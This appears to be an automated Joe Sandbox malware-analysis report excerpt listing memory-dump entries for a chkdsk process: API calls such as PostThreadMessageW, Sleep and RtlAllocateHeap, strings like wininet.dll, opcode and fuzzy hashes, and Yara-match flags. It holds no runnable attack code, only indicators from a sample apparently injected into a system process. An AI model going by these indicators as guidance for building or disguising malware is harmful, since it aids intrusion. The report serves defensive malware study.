                                                      • Instruction Fuzzy Hash: F4900232606800129240715848C5586802597F4301B95C012F0428555C8B148A566361
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 76a5ec250fd734f4428451aca6e49bc6c280eb6213769198c78c1b0e08ad947c
                                                      • Instruction ID: 886d6a7dde529a674827a1064ca99f78017adf35fbe84220d0feefe063d64699
                                                      • Opcode Fuzzy Hash: 76a5ec250fd734f4428451aca6e49bc6c280eb6213769198c78c1b0e08ad947c
                                                      • Instruction Fuzzy Hash: EF90022A21340002D2807158544964A402587E5202FD5D416B0019559CCA1589696321
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 6398b09fd6f4b76af1618ca18c76f1bb5d6260d59fa064aff457490c5cf7d1a8
                                                      • Instruction ID: c26daef65ef7202c70d2dd39106220d188a8092b7fb6fd2ba869fcea6e0a0c38
                                                      • Opcode Fuzzy Hash: 6398b09fd6f4b76af1618ca18c76f1bb5d6260d59fa064aff457490c5cf7d1a8
                                                      • Instruction Fuzzy Hash: 2590022230240003D240715854596468025D7F5301F95D012F0418555CDA1589566222
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: e155c7778804f2b4e9513580b2a2d91be26c237d648509a0b0fe6de23f2585bc
                                                      • Instruction ID: 62196851dce44041657c8a5d1dc27e28c701f9636083bc8d8c969a94f228109b
                                                      • Opcode Fuzzy Hash: e155c7778804f2b4e9513580b2a2d91be26c237d648509a0b0fe6de23f2585bc
                                                      • Instruction Fuzzy Hash: F5900222243441525645B1584445547802697F42417D5C013B1418951C86269956E621
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 018f33c55993c6d26e6aa76dc0a234b5647db66dd5d150d7b827fd9c86ff393c
                                                      • Instruction ID: 91b22ae47935fae8e79834dde739c6665ccf749eada328e31d89f646aff30b67
                                                      • Opcode Fuzzy Hash: 018f33c55993c6d26e6aa76dc0a234b5647db66dd5d150d7b827fd9c86ff393c
                                                      • Instruction Fuzzy Hash: 2090023220240413D21171584545747402987E4241FD5C413B0428559D97568A52B121
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 6ffe450a0bae5eec38556eb913d813710daed5446f0bcf714e67030e8356d939
                                                      • Instruction ID: e997e2722ed140a6e971aaf330015b965d073684e9883dd1cde41032434a4d87
                                                      • Opcode Fuzzy Hash: 6ffe450a0bae5eec38556eb913d813710daed5446f0bcf714e67030e8356d939
                                                      • Instruction Fuzzy Hash: 0090023220240842D20071584445B86402587F4301F95C017B0128655D8715C9517521
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: e4dffc9c0cc94d5dfd84e9c060340b9e9c09c0ec7d8d80f87ccb3b4799ff1616
                                                      • Instruction ID: bb455d3a140c634dee6a8da8eba4b968e79ba3b07dd2e686f1a9bbe1635bfd26
                                                      • Opcode Fuzzy Hash: e4dffc9c0cc94d5dfd84e9c060340b9e9c09c0ec7d8d80f87ccb3b4799ff1616
                                                      • Instruction Fuzzy Hash: 0590023220248802D2107158844578A402587E4301F99C412B4428659D879589917121
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 5f8680f1db5820922915df0b12166482823cb59d23a99ac335ada5be9f3a397f
                                                      • Instruction ID: 65fe290c9714ceea0581e00a8352ebaa288bc04d6f31fbb4be9bdc00615f786a
                                                      • Opcode Fuzzy Hash: 5f8680f1db5820922915df0b12166482823cb59d23a99ac335ada5be9f3a397f
                                                      • Instruction Fuzzy Hash: 9490023220240402D20075985449686402587F4301F95D012B5028556EC76589917131
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: d928bd5557735ce32520765fd9fc3a67c23f5c384a24e62c27df39360cbd4bbc
                                                      • Instruction ID: 3c4928ac148a72b1e09b3b6f6f8dc860c8c1cd89e2f9671acb2304624f0ad30e
                                                      • Opcode Fuzzy Hash: d928bd5557735ce32520765fd9fc3a67c23f5c384a24e62c27df39360cbd4bbc
                                                      • Instruction Fuzzy Hash: EF90026234240442D20071584455B464025C7F5301F95C016F1068555D8719CD527126
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: f9ffe17a9bde6444c40819ea3cb2c7aed9a1ab5b8b9e3a6457eab6a17e5c3b3c
                                                      • Instruction ID: 1c8104035a4fa9fdafa0c0244577b4c0d38bf62960a62139a6f28cc20d0cb67f
                                                      • Opcode Fuzzy Hash: f9ffe17a9bde6444c40819ea3cb2c7aed9a1ab5b8b9e3a6457eab6a17e5c3b3c
                                                      • Instruction Fuzzy Hash: EB900222212C0042D30075684C55B47402587E4303F95C116B0158555CCA1589616521
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: a603763f77e295d8248d7e4937dabd3c2097cd23f0feb53b122802bb9c32145b
                                                      • Instruction ID: 60efeccbeb47f31c1248316ac48e2a0638c39ca18c590173646c7542ac7e0ac1
                                                      • Opcode Fuzzy Hash: a603763f77e295d8248d7e4937dabd3c2097cd23f0feb53b122802bb9c32145b
                                                      • Instruction Fuzzy Hash: 39900222602400424240716888859468025ABF5211795C122B099C551D865989656665
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 650be16d22c0eed2744a89f0a064f5a992afcdac5ba84ca252916684426f3a40
                                                      • Instruction ID: 45ee58cffcc39c14fa180a66efb6852863dc7b3c5c9bbc88423b1a24f834000b
                                                      • Opcode Fuzzy Hash: 650be16d22c0eed2744a89f0a064f5a992afcdac5ba84ca252916684426f3a40
                                                      • Instruction Fuzzy Hash: 9890026220280403D24075584845647402587E4302F95C012B2068556E8B298D517135
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 580bf2dfce1055e336f01d1b44cccca8ed19af51925309ab305200c513e5d658
                                                      • Instruction ID: 8ee3350b1cff8656d3e8ae3abb8a64d4a8ca89b133618fd76d63c390243efe55
                                                      • Opcode Fuzzy Hash: 580bf2dfce1055e336f01d1b44cccca8ed19af51925309ab305200c513e5d658
                                                      • Instruction Fuzzy Hash: A790022260240502D20171584445656402A87E4241FD5C023B1028556ECB258A92B131
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: e1a3c0cb237ffb40be644ad4926f11b316c04d4991e6cbf436bc6058067e446f
                                                      • Instruction ID: 06d7c3aceccd5a3c1ffc52d9ea29fa0855a2eadfd50e1440afec5d750a1875c0
                                                      • Opcode Fuzzy Hash: e1a3c0cb237ffb40be644ad4926f11b316c04d4991e6cbf436bc6058067e446f
                                                      • Instruction Fuzzy Hash: 8B90022224645102D250715C44456568025A7F4201F95C022B0818595D865589557221
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 40c79e7f882e0d49e04d3cec9f7c1ca01457bfbf78e0f113cdb27690fb02bf25
                                                      • Instruction ID: 0ca59c23edd0a95719af5cc64d86243f8b00d3ff38e62b1cab785328a4fc46e6
                                                      • Opcode Fuzzy Hash: 40c79e7f882e0d49e04d3cec9f7c1ca01457bfbf78e0f113cdb27690fb02bf25
                                                      • Instruction Fuzzy Hash: 2190026220340003420571584455656802A87F4201B95C022F1018591DC62589917125
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: b84cbbc4920691bc690f2ef6dd3e518ea87ec5dfdf60f07cb466cfe0770200c0
                                                      • Instruction ID: 128703e8626485077e4524eb85c04850179dc35594a98ec522afe2c49de0179b
                                                      • Opcode Fuzzy Hash: b84cbbc4920691bc690f2ef6dd3e518ea87ec5dfdf60f07cb466cfe0770200c0
                                                      • Instruction Fuzzy Hash: 4990023220644842D24071584445A86403587E4305F95C012B0068695D97258E55B661
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: eafd4d431a7cc3779f05b4130208107ed5c4da2f585d5e8801d520a425c90f89
                                                      • Instruction ID: a5b0ff7a7bbd9bf92611ce9ea2556ceffa65f2dd04dc5668ad0d342bb1aeaa3f
                                                      • Opcode Fuzzy Hash: eafd4d431a7cc3779f05b4130208107ed5c4da2f585d5e8801d520a425c90f89
                                                      • Instruction Fuzzy Hash: F990023220240802D2807158444568A402587E5301FD5C016B0029655DCB158B5977A1
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 59c4183841f85d508b609d851183ecdb625bddaa87786fbe6162df834dc159c0
                                                      • Instruction ID: 68e6f16fbe17adc9b0662cea3447ad919bc10f6b08a11e9b58abee9a0f789271
                                                      • Opcode Fuzzy Hash: 59c4183841f85d508b609d851183ecdb625bddaa87786fbe6162df834dc159c0
                                                      • Instruction Fuzzy Hash: 9390023260640802D25071584455786402587E4301F95C012B0028655D87558B5576A1
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: a2cd0c714c765691acad63bd7138885c679fddf922ffc4b3ad9313158abbdc49
                                                      • Instruction ID: 9d4d19e10681e247904e20eb3a71387fa483395afe5356338d4446d7713316a5
                                                      • Opcode Fuzzy Hash: a2cd0c714c765691acad63bd7138885c679fddf922ffc4b3ad9313158abbdc49
                                                      • Instruction Fuzzy Hash: 28900226212400030205B5580745547406687E9351395C022F1019551CD72189616121
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3766101465.00000000053B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053B0000, based on PE: true
                                                      • Associated: 00000017.00000002.3766101465.00000000054D9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.00000000054DD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000017.00000002.3766101465.000000000554E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_53b0000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 9c26d1adcf8a6b01f2e043325740b7a8483e941f4b486bc8df3f56963c383c15
                                                      • Instruction ID: faedea6d44ebeb65e10b917d1970f2ec7a0d18353e12625f4775c0c461df07fd
                                                      • Opcode Fuzzy Hash: 9c26d1adcf8a6b01f2e043325740b7a8483e941f4b486bc8df3f56963c383c15
                                                      • Instruction Fuzzy Hash: 5B900226222400020245B558064554B446597EA3513D5C016F141A591CC72189656321
                                                      Control-flow Graph (legend: Executed / Not Executed)
                                                      control_flow_graph 598 7601ff-760205 599 760207-76020b 598->599 600 760230-76029e call 779690 call 77a0a0 call 763be0 call 751410 call 770a00 598->600 599->600 611 7602c0-7602c5 600->611 612 7602a0-7602b1 PostThreadMessageW 600->612 612->611 613 7602b3-7602bd 612->613 613->611
                                                      APIs
                                                      • PostThreadMessageW.USER32(2E85-1J297,00000111,00000000,00000000), ref: 007602AD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: 2E85-1J297$2E85-1J297
                                                      • API String ID: 1836367815-2292425170
                                                      • Opcode ID: ea8dc3d9c3447559d540e6d901886e79264df6b1ffa234ff59c1ae421aebd605
                                                      • Instruction ID: 92b5e36b85caf8bced2ac756a327211e30afb579cbf6055795e89109a1165a6f
                                                      • Opcode Fuzzy Hash: ea8dc3d9c3447559d540e6d901886e79264df6b1ffa234ff59c1ae421aebd605
                                                      • Instruction Fuzzy Hash: 44110A71D40248B6DB11A7A08C07FDF7B7C5F81750F008255FE14BB1C1E678A60687E5
                                                      Control-flow Graph (legend: Executed / Not Executed)
                                                      control_flow_graph 614 76022a-760240 615 760249-76029e call 77a0a0 call 763be0 call 751410 call 770a00 614->615 616 760244 call 779690 614->616 625 7602c0-7602c5 615->625 626 7602a0-7602b1 PostThreadMessageW 615->626 616->615 626->625 627 7602b3-7602bd 626->627 627->625
                                                      APIs
                                                      • PostThreadMessageW.USER32(2E85-1J297,00000111,00000000,00000000), ref: 007602AD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: 2E85-1J297$2E85-1J297
                                                      • API String ID: 1836367815-2292425170
                                                      • Opcode ID: d47d530e30957930460fab38316295c075d586d169e600f9ad0bb35da11151a9
                                                      • Instruction ID: b6d9ccd34c0657189ab45fc7213e7123c0bda59ab81cc8031e4fa50adef97af6
                                                      • Opcode Fuzzy Hash: d47d530e30957930460fab38316295c075d586d169e600f9ad0bb35da11151a9
                                                      • Instruction Fuzzy Hash: B911C871D41358B6EB21AAA08C06FDF7B7C5F41790F048055FE087B181E67896068BE5
                                                      APIs
                                                      • PostThreadMessageW.USER32(2E85-1J297,00000111,00000000,00000000), ref: 007602AD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: 2E85-1J297$2E85-1J297
                                                      • API String ID: 1836367815-2292425170
                                                      • Opcode ID: 3b1b99b9c13a98c7ba04de89d0eadab1f8c91b9564677e330a7a51c3aea08bc4
                                                      • Instruction ID: a0f2154687ed917c24be594056cb739b4bccc8191d05c2c7adcd15ac6980835d
                                                      • Opcode Fuzzy Hash: 3b1b99b9c13a98c7ba04de89d0eadab1f8c91b9564677e330a7a51c3aea08bc4
                                                      • Instruction Fuzzy Hash: 02019671D41358B6EB11ABA08C06FDF7B7C9F41B90F058165FE087B181E6B866068BE5
                                                      APIs
                                                      • Sleep.KERNELBASE(000007D0), ref: 0077238B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID: net.dll$wininet.dll
                                                      • API String ID: 3472027048-1269752229
                                                      • Opcode ID: 5e4915f54d8920f0a65079b900206bbd1372dc618a7ed44f0fe160733810f925
                                                      • Instruction ID: f50bf80f5620483a10bf29463f708d861b9e4462bc76d5780415b2e52ad94f8f
                                                      • Opcode Fuzzy Hash: 5e4915f54d8920f0a65079b900206bbd1372dc618a7ed44f0fe160733810f925
                                                      • Instruction Fuzzy Hash: AA3170B1641705FBCB14DF64C885FE6BBA8AB44340F008519B61D9B241D778BA55CBA0
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00760E49,?,Bw,00760E49,00773DC7,00774209,?,00760E49,00773DC7,00001000,?,?,007792F3), ref: 00777A5F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID: Bw
                                                      • API String ID: 1279760036-4240321413
                                                      • Opcode ID: c286dcae18159a84dbffeaf2fff31ae69f6c2988dca278fb47e8d07425d301a0
                                                      • Instruction ID: ca26ace8b85656c5d006b96c444e558d89cd092aa8d1629ee6b8225531d541af
                                                      • Opcode Fuzzy Hash: c286dcae18159a84dbffeaf2fff31ae69f6c2988dca278fb47e8d07425d301a0
                                                      • Instruction Fuzzy Hash: 24E06D71200244BFD614EE98EC45FEB37ADEF84720F108409F908A7241CA70BD10CBB4
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 0076E387
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Initialize
                                                      • String ID: @J7<
                                                      • API String ID: 2538663250-2016760708
                                                      • Opcode ID: ff12fda594aec73ca92d915bcb33bb9ce4d1c9d65c15240ca1ddb6ee378235be
                                                      • Instruction ID: 3a7fb241241134dd703457c6bfe8da92976734e63bcfff9483ea5775505dc122
                                                      • Opcode Fuzzy Hash: ff12fda594aec73ca92d915bcb33bb9ce4d1c9d65c15240ca1ddb6ee378235be
                                                      • Instruction Fuzzy Hash: B03140B5A006099FDB00DF98C8809EFB7B9FF88304F108559F906EB215DB74AE45CBA0
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 0076E387
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_750000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Initialize
                                                      • String ID: @J7<
                                                      • API String ID: 2538663250-2016760708
                                                      • Opcode ID: 27cc4ac8af34ea21c69b4d0e7073fdd397a4a5683a00f57dd03264e858539acb
                                                      • Instruction ID: 74c5c97a9b63dc83cb7771226551a320ce07374caa80c4eb8f47ebf39b01a26f
